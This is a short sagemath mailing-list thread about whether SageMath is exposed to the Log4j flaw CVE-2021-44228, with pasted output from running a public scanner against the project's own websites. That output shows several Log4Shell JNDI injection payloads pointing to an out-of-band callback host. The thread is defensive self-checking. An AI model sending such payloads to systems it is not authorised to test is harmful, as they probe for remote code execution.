Re: [sage-support] log4j

2021-12-14 Thread William Stein
On Tue, Dec 14, 2021 at 2:25 PM Adil Hasan wrote:

> Hello folks,
>
> In case you are concerned that you may be impacted by the Java log4j bug,
> you can download this application which will check if a supplied url is
> vulnerable to the bug:
>
> https://github.com/fullhunt/log4j-scan
>

Thanks.  It seems the sagemath.org infrastructure is in good shape
regarding this:

Last login: Tue Dec 14 16:45:00 on ttys058

wstein@max ~ % python3 log4j-scan.py -u https://ask.sagemath.org

/Library/Frameworks/Python.framework/Versions/3.10/bin/python3: can't open
file '/Users/wstein/log4j-scan.py': [Errno 2] No such file or directory

wstein@max ~ % cd /tmp/log4j-scan

wstein@max log4j-scan % python3 log4j-scan.py -u https://ask.sagemath.org

[•] CVE-2021-44228 - Apache Log4j RCE Scanner

[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface
Management Platform.

[•] Secure your External Attack Surface with FullHunt.io.

[•] Initiating DNS callback server (interact.sh).

[%] Checking for Log4j RCE CVE-2021-44228.

[•] URL: https://ask.sagemath.org

[•] URL: https://ask.sagemath.org | PAYLOAD: ${jndi:ldap://
ask.sagemath.org.9187j80iik2n4oq9ud1re041i81939unm.interact.sh/tjtni2c}

[•] Payloads sent to all URLs. Waiting for DNS OOB callbacks.

[•] Waiting...

[•] Targets does not seem to be vulnerable.

wstein@max log4j-scan % python3 log4j-scan.py -u https://wiki.sagemath.org

[•] CVE-2021-44228 - Apache Log4j RCE Scanner

[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface
Management Platform.

[•] Secure your External Attack Surface with FullHunt.io.

[•] Initiating DNS callback server (interact.sh).

[%] Checking for Log4j RCE CVE-2021-44228.

[•] URL: https://wiki.sagemath.org

[•] URL: https://wiki.sagemath.org | PAYLOAD: ${jndi:ldap://
wiki.sagemath.org.5607rfj3i02047m4itt61pu684hsv539c.interact.sh/zpbgczb}

[•] Payloads sent to all URLs. Waiting for DNS OOB callbacks.

[•] Waiting...

[•] Targets does not seem to be vulnerable.

wstein@max log4j-scan % python3 log4j-scan.py -u https://trac.sagemath.org

[•] CVE-2021-44228 - Apache Log4j RCE Scanner

[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface
Management Platform.

[•] Secure your External Attack Surface with FullHunt.io.

[•] Initiating DNS callback server (interact.sh).

[%] Checking for Log4j RCE CVE-2021-44228.

[•] URL: https://trac.sagemath.org

[•] URL: https://trac.sagemath.org | PAYLOAD: ${jndi:ldap://
trac.sagemath.org.xgge21465p6t46hq87n64t350054fg25o.interact.sh/kjy8og1}

[•] Payloads sent to all URLs. Waiting for DNS OOB callbacks.

[•] Waiting...

[•] Targets does not seem to be vulnerable.

wstein@max log4j-scan % python3 log4j-scan.py -u https://www.sagemath.org

[•] CVE-2021-44228 - Apache Log4j RCE Scanner

[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface
Management Platform.

[•] Secure your External Attack Surface with FullHunt.io.

[•] Initiating DNS callback server (interact.sh).

[%] Checking for Log4j RCE CVE-2021-44228.

[•] URL: https://www.sagemath.org

[•] URL: https://www.sagemath.org | PAYLOAD: ${jndi:ldap://
www.sagemath.org.bx6i660og07o49v6qb2f9ou48r846433j.interact.sh/1qs7xvd}

[•] Payloads sent to all URLs. Waiting for DNS OOB callbacks.

[•] Waiting...

[•] Targets does not seem to be vulnerable.

wstein@max log4j-scan %



-- 
William (http://wstein.org)

-- 
You received this message because you are subscribed to the Google Groups 
"sage-support" group.
To unsubscribe from this group and stop receiving emails from it, send an email 
to sage-support+unsubscr...@googlegroups.com.
To view this discussion on the web visit 
https://groups.google.com/d/msgid/sage-support/CACLE5GDuYX49_6yu%3DN67hw2n-c3Mqekrx0psECFT%3DDONp24g6g%40mail.gmail.com.


Re: [sage-support] log4j

2021-12-14 Thread Adil Hasan
Hello folks,

In case you are concerned that you may be impacted by the Java log4j bug, you 
can download this application which will check if a supplied url is vulnerable 
to the bug:

https://github.com/fullhunt/log4j-scan 


Hth adil

> On 14 Dec 2021, at 22:10, Angela Hicks wrote:
> 
> Thanks, William!
> Best,
> Angela
> 
> On Tue, Dec 14, 2021 at 4:54 PM William Stein wrote:
> I think that Sage doesn’t make any use of the JVM or Java so Sage is not 
> vulnerable to the log4j exploit. 
> 
> On Tue, Dec 14, 2021 at 6:47 AM Angela Hicks wrote:
> Has anyone more knowledgeable than I (admittedly a low bar) about sage's 
> internals (admittedly a low bar) thought about whether sage uses any 
> libraries that make it vulnerable to the log4j vulnerability?
> -Angela
> 
> -- 
> -- William Stein
> 


Re: [sage-support] log4j

2021-12-14 Thread Angela Hicks
Thanks, William!
Best,
Angela

On Tue, Dec 14, 2021 at 4:54 PM William Stein wrote:

> I think that Sage doesn’t make any use of the JVM or Java so Sage is not
> vulnerable to the log4j exploit.
>
> On Tue, Dec 14, 2021 at 6:47 AM Angela Hicks wrote:
>
>> Has anyone more knowledgeable than I (admittedly a low bar) about sage's
>> internals (admittedly a low bar) thought about whether sage uses any
>> libraries that make it vulnerable to the log4j vulnerability?
>> -Angela
>>
>>
> --
> -- William Stein
>


Re: [sage-support] log4j

2021-12-14 Thread William Stein
I think that Sage doesn’t make any use of the JVM or Java so Sage is not
vulnerable to the log4j exploit.

On Tue, Dec 14, 2021 at 6:47 AM Angela Hicks wrote:

> Has anyone more knowledgeable than I (admittedly a low bar) about sage's
> internals (admittedly a low bar) thought about whether sage uses any
> libraries that make it vulnerable to the log4j vulnerability?
> -Angela
>
>
-- 
-- William Stein



[sage-support] log4j

2021-12-14 Thread Angela Hicks
Has anyone more knowledgeable than I (admittedly a low bar) about sage's 
internals (admittedly a low bar) thought about whether sage uses any 
libraries that make it vulnerable to the log4j vulnerability?
-Angela
